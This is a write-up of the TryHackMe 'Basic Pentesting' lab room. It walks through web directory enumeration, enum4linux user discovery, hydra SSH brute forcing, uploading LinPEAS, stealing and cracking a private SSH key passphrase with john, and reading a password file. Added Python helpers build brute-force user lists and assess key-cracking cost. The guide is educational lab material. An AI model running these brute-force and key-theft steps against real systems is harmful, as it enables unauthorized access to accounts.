THM_Basic_PenTest_Walkthrough
Basic PenTesting TryHackMe
performed by: jb-williams
Summary
- Hidden directory on the web server (`development`, found via DirBuster with rockyou).
- Usernames (`jan` and `kay`, found via enum4linux).
- Password (`jan:armando`, found via hydra against SSH).
- Private SSH key for kay found with LinPEAS.
- Cracked the SSH key passphrase (ssh2john + john).
- Logged in as kay and read `pass.bak`.
User | Pass | Service | SSH Key | IP | Port |
---|---|---|---|---|---|
jan | armando | ssh | none | 10.10.62.206 | 22 |
kay | beeswax (key passphrase) | ssh | kay_id_rsa | 10.10.62.206 | 22 |
Port | Service |
---|---|
22 | OpenSSH 7.2 |
80 | Apache httpd 2.4.18 |
139 | Samba smbd 3.X - 4.X |
445 | Samba smbd 4.3.11 |
8009 | Apache JServ (AJP) 1.3 |
8080 | Apache Tomcat 9.0.7 |
Scanning & Enumeration
- Scanned the machine on the network. IP: 10.10.62.206
- Discovered these ports and services running on the device:
  - 22 - OpenSSH 7.2
  - 80 - Apache httpd 2.4.18
  - 139 - Samba smbd 3.X - 4.X
  - 445 - Samba smbd 4.3.11
  - 8009 - Apache JServ (AJP) 1.3
  - 8080 - Apache Tomcat 9.0.7
- Began enumeration of the web page on port 80 with DirBuster.
- Discovered:
  - /development/
  - /development/dev.txt
  - /development/j.txt
- `/development/dev.txt` mentions Apache Struts 2.5.12 and is signed with initials that I assume belong to employees: K and J.
- `/development/j.txt` contains a message from K telling J that their password is weak and can be cracked easily.
Brute Forcing
- Ran enum4linux on the target IP, splitting the output to STDOUT and a file:
enum4linux -a 10.10.62.206 | tee -a enum4linux.log
- Enum4linux found the full usernames `kay` and `jan`.
- Brute-forced SSH with hydra to find jan's password:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.62.206
- Credentials that were Found:
User | Pass | Service | IP | Port |
---|---|---|---|---|
jan | armando | ssh | 10.10.62.206 | 22 |
- Verified login credentials.
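Rather than copying the names out of the enum4linux log by hand, the parser below pulls them into a user list that hydra can take with `-L`. This is an added example for this walkthrough, not code from the original post or from enum4linux. The sample log is constructed to mirror the two line shapes enum4linux prints for users (rpcclient's `enumdomusers` lines and RID cycling over the Unix-users SID `S-1-22-1`); the function names are my own.

```python
import re
from typing import Dict

# Constructed sample of `enum4linux -a` output (not the log from this walkthrough).
# Both line shapes are real enum4linux output: the first block is rpcclient's
# enumdomusers, the second is RID cycling over the Unix-users SID S-1-22-1.
SAMPLE_LOG = r"""
 ============================ 
|    Users on 10.10.62.206    |
 ============================ 
user:[kay] rid:[0x3e8]
user:[jan] rid:[0x3e9]

 ============================================ 
|    Users on 10.10.62.206 via RID cycling    |
 ============================================ 
[I] Found new SID: S-1-22-1
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-5-21-1234-5678-9012-513 Domain Users (Local Group)
"""

ENUMDOMUSERS = re.compile(r"^user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-f]+)\]", re.I)
RID_CYCLE = re.compile(r"^(?P<sid>S-1-[\d-]+)\s+.+?\\(?P<name>\S+)\s+\(Local User\)")


def extract_users(log: str) -> Dict[str, dict]:
    """Return {username: {"rid": int|None, "uid": int|None}} from enum4linux text.

    Names are lowercased because Linux logins are case-sensitive: feeding "Kay"
    to hydra would never match an account stored as "kay".
    """
    users: Dict[str, dict] = {}
    for raw in log.splitlines():
        line = raw.strip()
        m = ENUMDOMUSERS.match(line)
        if m:
            entry = users.setdefault(m["name"].lower(), {"rid": None, "uid": None})
            entry["rid"] = int(m["rid"], 16)
            continue
        m = RID_CYCLE.match(line)
        if m:
            entry = users.setdefault(m["name"].lower(), {"rid": None, "uid": None})
            # S-1-22-1-<uid> is Samba's mapping for local Unix users; the last
            # component is the Unix UID, so >= 1000 marks a regular (human) account.
            if m["sid"].startswith("S-1-22-1-"):
                entry["uid"] = int(m["sid"].rsplit("-", 1)[1])
    return users


def human_accounts(users: Dict[str, dict]) -> list:
    """Keep accounts that look like real logins (UID >= 1000, or UID unknown)."""
    return sorted(n for n, v in users.items() if v["uid"] is None or v["uid"] >= 1000)


def userlist_text(users: Dict[str, dict]) -> str:
    """One name per line, ready for: hydra -L users.txt -P rockyou.txt ssh://TARGET"""
    return "\n".join(human_accounts(users)) + "\n"


if __name__ == "__main__":
    found = extract_users(SAMPLE_LOG)
    print(found)
    print(userlist_text(found), end="")
```

Writing `userlist_text()` to a file and passing it with `-L` (plus `-t 4`, since OpenSSH rate-limits parallel auth attempts) replaces the single `-l jan` run above when more than one name comes back from enumeration.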
Internal Enumeration
- Logged into `jan`'s account through SSH.
- I was able to traverse to `/home/kay` and see that there was a `pass.bak` file there.
- However, as jan I was unable to read anything in `/home/kay`.
- From my host, I used scp to transfer LinPEAS to the machine's shared-memory filesystem, then ran it from there:
scp /opt/linpeas/linpeas.sh jan@10.10.62.206:/dev/shm
ssh jan@10.10.62.206
cd /dev/shm && chmod +x linpeas.sh && ./linpeas.sh | tee linlog.txt
- This enumeration pointed me to kay's private SSH key, which jan was able to read:
/home/kay/.ssh/id_rsa
- I copied it to my host as `kay_id_rsa` and tightened the permissions, since ssh refuses to use a key that is readable by other users:
chmod 600 kay_id_rsa
- Discovered the SSH key was passphrase-protected, so I ran it through ssh2john, wrote the resulting hash to a text file, and then ran john on it:
python3 /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
john forjohn.txt
- John found kay's key passphrase: `beeswax`
- SSH'd into the machine as kay with the key:
ssh -i kay_id_rsa kay@10.10.62.206
- Entered the passphrase `beeswax` when prompted.
User | Pass | Service | SSH Key | IP | Port |
---|---|---|---|---|---|
kay | beeswax | ssh | kay_id_rsa | 10.10.62.206 | 22 |
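Before reaching for ssh2john it is worth confirming that a recovered key really is passphrase-protected and which cipher and KDF guard it, because that decides how expensive the crack will be: a legacy PEM key (`Proc-Type: 4,ENCRYPTED` / `DEK-Info` headers) derives its AES key with a single MD5 pass over the passphrase, while an `openssh-key-v1` key normally uses bcrypt, which is far slower per guess. The checker below is an added example, not code from the room or the original post; it reads only the headers of both formats. The sample keys are constructed placeholders with no real key material (`build_openssh_key_text` and the placeholder base64 body are mine).

```python
import base64
import struct
from typing import Dict, Tuple

# Constructed legacy-PEM sample with the RFC 1421 headers OpenSSL writes for an
# encrypted key. The base64 body is a placeholder, not key material; the legacy
# branch of the checker never decodes it.
LEGACY_ENCRYPTED_SAMPLE = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

UExBQ0VIT0xERVIgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(buf: bytes, off: int) -> Tuple[bytes, int]:
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def build_openssh_key_text(cipher: str, kdf: str) -> str:
    """Constructed openssh-key-v1 file for testing: magic, ciphername, kdfname,
    empty kdfoptions and a key count of 1, with no key material at all."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    body = (b"openssh-key-v1\x00" + s(cipher.encode()) + s(kdf.encode())
            + s(b"") + struct.pack(">I", 1))
    b64 = base64.b64encode(body).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"


def inspect_ssh_key(text: str) -> Dict[str, object]:
    """Report the key format, whether a passphrase is needed, and the cipher/KDF."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines:
        raise ValueError("empty key file")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not body.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        # Header layout: magic, string ciphername, string kdfname, string kdfoptions ...
        cipher, off = _ssh_string(body, len(magic))
        kdf, _ = _ssh_string(body, off)
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode()}
    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): encryption is signalled by RFC 1421
    # headers right after the BEGIN line, terminated by a blank line.
    headers: Dict[str, str] = {}
    for ln in lines[1:]:
        if not ln or ":" not in ln:
            break
        key, value = ln.split(":", 1)
        headers[key.strip()] = value.strip()
    if headers.get("Proc-Type") == "4,ENCRYPTED" and "DEK-Info" in headers:
        parts = [p.strip() for p in headers["DEK-Info"].split(",", 1)]
        iv_hex = parts[1] if len(parts) > 1 else ""
        # OpenSSL derives the key with EVP_BytesToKey (MD5, one iteration,
        # salt = first 8 bytes of the IV): cheap to brute-force.
        return {"format": "pem", "encrypted": True, "cipher": parts[0],
                "kdf": "EVP_BytesToKey-MD5", "iv": iv_hex}
    return {"format": "pem", "encrypted": False, "cipher": "none", "kdf": "none"}


if __name__ == "__main__":
    print(inspect_ssh_key(LEGACY_ENCRYPTED_SAMPLE))
    print(inspect_ssh_key(build_openssh_key_text("aes256-ctr", "bcrypt")))
    print(inspect_ssh_key(build_openssh_key_text("none", "none")))
```

Run it against the copied `kay_id_rsa` with `inspect_ssh_key(open("kay_id_rsa").read())`; if `encrypted` comes back `False` there is nothing to crack and `ssh -i` will log in directly, and if the KDF is bcrypt, budget for a much slower john run than the legacy MD5 case.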
- As kay I was able to read the `pass.bak` file:
cat pass.bak
- With that I found the password / last flag:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
written and performed by jb-williams - github
linux ssh bruteforce password-cracking enumeration walkthrough web app tryhackme basic-pentesting
2022-09-17 18:46